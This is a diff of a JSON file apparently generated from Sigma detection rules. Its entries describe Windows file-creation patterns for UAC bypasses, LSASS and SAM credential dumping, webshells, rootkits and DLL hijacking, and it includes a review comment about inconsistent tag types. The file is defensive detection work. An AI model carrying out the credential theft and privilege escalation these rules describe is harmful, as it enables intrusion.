"falsepositive": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" + ], + "tags": "No established tags" + }, + "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "value": "Suspicious Interactive PowerShell as SYSTEM" + }, { "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", "meta": { 
@@ -24746,20 +26138,45 @@ "value": "UAC Bypass Using IDiagnostic Profile - File" }, { - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "file_event_win_susp_desktopimgdownldr_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1105" + ] + }, + "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "value": "Suspicious Desktopimgdownldr Target File" + }, + { + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", "meta": { "author": "Christian Burkard", - "creation_date": "2021/08/30", + "creation_date": "2021/08/23", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml", + "filename": "file_event_win_uac_bypass_consent_comctl32.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" ], "tags": [ "attack.defense_evasion", 
@@ -24767,8 +26184,89 @@ "attack.t1548.002" ] }, - "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "value": "UAC Bypass Using IEInstal - File" + "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "value": "UAC Bypass Using Consent and Comctl32 - File" + }, + { + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Rare cases of administrative activity" + ], + "filename": "file_event_win_sam_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/cube0x0/CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", + "https://github.com/HuskyHacks/ShadowSteal", + "https://github.com/search?q=CVE-2021-36934", + "https://github.com/FireFart/hivenightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", + "value": "SAM Dump File Creation" + }, + { + "description": "Detects suspicious .NET assembly executions. 
Could detect using Cobalt Strike's command execute-assembly.", + "meta": { + "author": "omkar72, oscd.community, Wojciech Lesicki", + "creation_date": "2020/10/12", + "falsepositive": [ + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + ], + "filename": "file_event_win_susp_clr_logs.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1218" + ] + }, + "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263", + "value": "Suspicious CLR Logs Creation" + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_moriya_rootkit.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "value": "Moriya Rootkit" }, { "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack 
(UACMe 55)", 
@@ -24796,29 +26294,81 @@ "value": "UAC Bypass Using MSConfig Token Modification - File" }, { - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", + "author": "frack113", + "creation_date": "2021/12/19", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", + "filename": "file_event_win_access_susp_unattend_xml.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "value": "Suspicious Unattend.xml File Access" + }, + { + "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. 
Which could indicate tampering with default evtx locations in order to evade security controls", + "meta": { + "author": "D3F7A5105", + "creation_date": "2023/01/02", + "falsepositive": [ + "Admin activity", + "Backup activity" + ], + "filename": "file_event_win_create_evtx_non_common_locations.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "value": "EVTX Created In Uncommon Location" + }, + { + "description": "Detects files written by the different tools that exploit HiveNightmare", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/23", + "falsepositive": [ + "Files that accidentally contain these strings" + ], + "filename": "file_event_win_hivenightmare_file_exports.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" + "https://github.com/WiredPulse/Invoke-HiveNightmare", + "https://github.com/FireFart/hivenightmare/", + "https://github.com/GossiTheDog/HiveNightmare", + "https://twitter.com/cube0x0/status/1418920190759378944", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" ], "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ] }, - "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", - "value": "UAC Bypass Using NTFS Reparse Point - File" + "uuid": 
"6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "value": "Typical HiveNightmare SAM File Export" }, { "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", 
@@ -24846,20 +26396,70 @@ "value": "UAC Bypass Abusing Winsat Path Parsing - File" }, { - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "description": "Detects a dump file written by QuarksPwDump password dumper", "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", + "author": "Florian Roth", + "creation_date": "2018/02/10", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_uac_bypass_wmp.yml", + "filename": "file_event_win_quarkspw_filedump.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", + "value": "QuarksPwDump Dump File" + }, + { + "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", + "meta": { + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2021/10/25", + "falsepositive": [ + "Legitimate user creation" + ], + "filename": "file_event_win_mal_vhd_download.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", + "value": "Suspicious VHD Image Download From Browser" + }, 
+ { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_ieinstal.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" ], "tags": [ "attack.defense_evasion", 
@@ -24867,57 +26467,354 @@ "attack.t1548.002" ] }, - "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", - "value": "UAC Bypass Using Windows Media Player - File" + "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "value": "UAC Bypass Using IEInstal - File" }, { - "description": "Possible webshell file creation on a static web site", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { - "author": "Beyu Denis, oscd.community, Tim Shelton", - "creation_date": "2019/10/22", + "author": "frack113", + "creation_date": "2022/02/13", "falsepositive": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Legitimate use" ], - "filename": "file_event_win_webshell_creation_detect.yml", - "level": "high", + "filename": "file_event_win_screenconnect_artefact.yml", + "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "PT ESC rule and personal experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_screenconnect_artefact.yml" ], "tags": [ - "attack.persistence", - "attack.t1505.003" + 
"attack.command_and_control", + "attack.t1219" ] }, - "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", - "value": "Windows Webshell Creation" + "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", + "value": "ScreenConnect Temporary Installation Artefact" }, { - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", "meta": { - "author": "frack113", - "creation_date": "2022/05/09", + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/21", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_werfault_dll_hijacking.yml", + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", + "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" + ] + }, + "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "value": "Potential Initial Access via DLL Search Order Hijacking" + }, + { + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "meta": { + "author": "frack113", + "creation_date": "2022/01/21", + "falsepositive": [ + "Unknown" + ], + "filename": 
"file_event_win_susp_colorcpl.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" + "https://twitter.com/eral4m/status/1480468728324231172?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "value": "Suspicious Creation with Colorcpl" + }, + { + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_tsclient_filewrite_startup.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", + "value": "Hijack Legit RDP Session to Move Laterally" + }, + { + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". 
Which could indicates possible persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/10", + "falsepositive": [ + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins to enhance notepad++ functionality by users" + ], + "filename": "file_event_win_notepad_plus_plus_persistence.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", + "value": "Persistence Via Notepad++ Plugins" + }, + { + "description": "Detects windows executables that writes files with suspicious extensions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_shell_write_susp_files_extensions.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" + ], + "tags": "No established tags" + }, + "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "value": "Windows Binaries Write Suspicious Extensions" + }, + { + "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" + ], + "filename": "file_event_win_lsass_memory_dump_file_creation.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "value": "LSASS Memory Dump File Creation" + }, + { + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Cases in which a user mounts an image file for legitimate reasons" + ], + "filename": "file_event_win_iso_file_recent.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + 
"https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" + ], + "tags": "No established tags" + }, + "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "value": "ISO or Image Mount Indicator in Recent Files" + }, + { + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/13", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cve_2022_24527_lpe.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" + ] + }, + "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "value": "CVE-2022-24527 Microsoft Connected Cache LPE" + }, + { + "description": "Detects msdt.exe creating files in suspicious directories", + "meta": { + "author": "Vadim Varganov, Florian Roth", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_msdt_autorun.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" ], "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + 
"attack.t1547.001", + "cve.2022.30190" ] }, - "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "value": "Creation of an WerFault.exe in Unusual Folder" + "uuid": "318557a5-150c-4c8d-b70e-a9910e199857", + "value": "MSDT.exe Creates Files in Autorun Directory" + }, + { + "description": "Detects the creation of an executable by another executable", + "meta": { + "author": "frack113", + "creation_date": "2022/03/09", + "falsepositive": [ + "Software installers", + "Update utilities", + "32bit applications launching their 64bit versions" + ], + "filename": "file_event_win_susp_dropper.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Malware Sandbox", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dropper.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "297afac9-5d02-4138-8c58-b977bac60556", + "value": "Creation of an Executable by an Executable" + }, + { + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Rare legitimate usage of some of the extensions mentioned in the rule" + ], + "filename": "file_event_win_susp_startup_folder_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "value": "Suspicious Startup Folder Persistence" + }, + { + "description": "Detects the usage of ADSI (LDAP) operations by tools. 
This may also detect tools like LDAPFragger.", + "meta": { + "author": "xknow @xknow_infosec, Tim Shelton", + "creation_date": "2019/03/24", + "falsepositive": [ + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + ], + "filename": "file_event_win_susp_adsi_cache_usage.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://github.com/fox-it/LDAPFragger", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" + ], + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ] + }, + "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "value": "Suspicious ADSI-Cache Usage By Unknown Tool" + }, + { + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. 
Typical of Qakbot TTP from end-July 2022.", + "meta": { + "author": "@sam0x90", + "creation_date": "2022/07/30", + "falsepositive": [ + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + ], + "filename": "file_event_win_iso_file_mount.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Sam0x90/status/1552011547974696960", + "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "value": "ISO File Created Within Temp Folders" }, { "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", 
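Review bot: `meta.tags` is not type-stable in this hunk: the "Windows Binaries Write Suspicious Extensions" and "ISO or Image Mount Indicator in Recent Files" entries carry the string sentinel `"tags": "No established tags"` while every other entry carries an array of `attack.*`/`cve.*` strings, and the same sentinel appears earlier in the chunk on the "Suspicious Interactive PowerShell as SYSTEM" entry. Consumers that iterate `meta.tags` will either fail on the string or iterate its characters, and a galaxy importer may register "No established tags" as a literal tag value. Since the file appears to be generated from the Sigma repository, the fix belongs in the generator: emit `"tags": []` (or omit the key) when a rule has no tags, so the key keeps one type across the whole document.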
@@ -24944,53 +26841,255 @@ "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File" }, { - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", "meta": { - "author": "Florian Roth, Sittikorn S", - "creation_date": "2021/09/10", + "author": "frack113", + "creation_date": "2021/12/29", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_winword_cve_2021_40444.yml", + "filename": "file_event_win_creation_new_shim_database.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "value": "New Shim Database Created in the Default Directory" + }, + { + "description": "Possible webshell file creation on a static web site", + "meta": { + "author": "Beyu Denis, oscd.community, Tim Shelton", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate administrator or developer creating legitimate executable files in a web application folder" + ], + "filename": "file_event_win_webshell_creation_detect.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - 
"https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", - "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" + "PT ESC rule and personal experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" ], "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1505.003" ] }, - "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "value": "Suspicious Word Cab File Write CVE-2021-40444" + "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "value": "Windows Webshell Creation" }, { - "description": "Detects the creation of the default output filename used by the wmicexec tool", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/02", + "author": "frack113", + "creation_date": "2022/04/23", "falsepositive": [ - "Unlikely" + "Unknown" ], - "filename": "file_event_win_wmiexec_default_filename.yml", - "level": "critical", + "filename": "file_event_win_susp_get_variable.yml", + "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" + "https://www.joesandbox.com/analysis/465533/0/html", + 
"https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "value": "Suspicious Get-Variable.exe Creation" + }, + { + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/27", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_lsass_werfault_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/helpsystems/nanodump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "value": "WerFault LSASS Process Memory Dump" + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_access_susp_teams.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + 